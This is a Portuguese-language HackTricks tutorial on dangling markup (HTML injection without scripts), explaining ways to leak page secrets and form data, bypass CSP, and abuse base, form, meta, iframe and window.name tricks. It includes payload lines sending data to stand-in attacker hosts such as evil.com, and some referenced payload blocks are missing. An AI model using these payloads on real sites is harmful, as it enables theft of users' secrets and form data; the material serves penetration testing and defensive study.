- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
Esta técnica pode ser usada para extrair informações de um usuário quando uma **injeção HTML é encontrada**. Isso é muito útil se você **não encontrar nenhuma maneira de explorar um** [**XSS** ](xss-cross-site-scripting/) mas você pode **injetar algumas tags HTML**.\
Também é útil se algum **segredo é salvo em texto claro** no HTML e você deseja **exfiltrá-lo do cliente**, ou se você deseja enganar a execução de algum script.
Várias técnicas comentadas aqui podem ser usadas para contornar algumas [**Políticas de Segurança de Conteúdo**](content-security-policy-csp-bypass/) exfiltrando informações de maneiras inesperadas (tags html, CSS, http-meta tags, formulários, base...).
Se você injetar `<img src='http://evil.com/log.cgi?` quando a página for carregada, a vítima enviará para você todo o código entre a tag `img` injetada e a próxima aspa dentro do código. Se um segredo estiver localizado de alguma forma nesse trecho, você o roubará (você pode fazer a mesma coisa usando uma aspa dupla, veja qual pode ser mais interessante de usar).
Você também pode inserir uma tag `<base>`. Todas as informações serão enviadas até que a citação seja fechada, mas isso requer alguma interação do usuário (o usuário deve clicar em algum link, porque a tag base terá alterado o domínio apontado pelo link):
Defina um cabeçalho de formulário: `<form action='http://evil.com/log_steal'>` isso sobrescreverá o próximo cabeçalho do formulário e todos os dados do formulário serão enviados para o atacante.
Usando a técnica mencionada anteriormente para roubar formulários (injetando um novo cabeçalho de formulário), você pode então injetar um novo campo de entrada:
e este campo de entrada conterá todo o conteúdo entre suas aspas duplas e as próximas aspas duplas no HTML. Este ataque mistura "_**Roubo de segredos de texto claro**_" com "_**Roubo de formulários2**_".
Você pode fazer a mesma coisa injetando um formulário e uma tag `<option>`. Todos os dados até que um `</option>` fechado seja encontrado serão enviados:
`<noscript></noscript>` é uma tag cujo conteúdo será interpretado se o navegador não suportar javascript (você pode habilitar/desabilitar o Javascript no Chrome em [chrome://settings/content/javascript](chrome://settings/content/javascript)).
A partir desta pesquisa da [PortSwiggers](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup), é possível aprender que mesmo nos ambientes **mais restritos pelo CSP**, ainda é possível **extrair dados** com alguma **interação do usuário**. Nesta ocasião, vamos usar o payload:
Observe que você pedirá à **vítima** que **clique em um link** que o redirecionará para um **payload** controlado por você. Observe também que o atributo **`target`** dentro da tag **`base`** conterá **conteúdo HTML** até a próxima aspa simples.\
Isso fará com que o **valor** de **`window.name`** seja todo esse **conteúdo HTML** quando o link for clicado. Portanto, como você **controla a página** onde a vítima está acessando ao clicar no link, você pode acessar esse **`window.name`** e **extrair** esses dados:
Insira uma nova tag com um id dentro do HTML que irá sobrescrever a próxima e com um valor que afetará o fluxo de um script. Neste exemplo, você está selecionando com quem uma informação será compartilhada:
Observe que um **documento filho pode visualizar e definir a propriedade de localização do pai, mesmo que seja de origem cruzada.** Isso significa que você pode fazer com que o cliente acesse qualquer outra página carregando dentro de um **iframe** algum código como:
Um iframe também pode ser explorado para vazar informações sensíveis de uma página diferente **usando o atributo de nome do iframe**. Isso ocorre porque você pode criar um iframe que se auto-iframe abusando da injeção de HTML que faz com que as **informações sensíveis apareçam dentro do atributo de nome do iframe** e, em seguida, acessar esse nome do iframe inicial e vazá-lo.
Para mais informações, consulte [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
Você pode usar **`meta http-equiv`** para realizar **várias ações** como definir um Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` ou realizar um redirecionamento (em 5s neste caso): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
Isso pode ser **evitado** com um **CSP** em relação ao **http-equiv** (`Content-Security-Policy: default-src 'self';`, ou `Content-Security-Policy: http-equiv 'self';`)
Você pode encontrar uma pesquisa muito **interessante** sobre vulnerabilidades exploráveis da tag \<portal> [aqui](https://research.securitum.com/security-analysis-of-portal-element/).\
No momento em que este texto foi escrito, você precisa habilitar a tag portal no Chrome em `chrome://flags/#enable-portals` ou ela não funcionará.
Nem todas as maneiras de vazar conectividade em HTML serão úteis para o Dangling Markup, mas às vezes pode ajudar. Verifique aqui: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
XS-Search é orientado para **exfiltrar informações de origem cruzada** abusando de **ataques de canal lateral**. Portanto, é uma técnica diferente do Dangling Markup, no entanto, algumas das técnicas abusam da inclusão de tags HTML (com e sem execução JS), como [**Injeção de CSS**](xs-search.md#css-injection) ou [**Carregamento Lento de Imagens**](xs-search.md#image-lazy-loading)**.**
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me no****Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
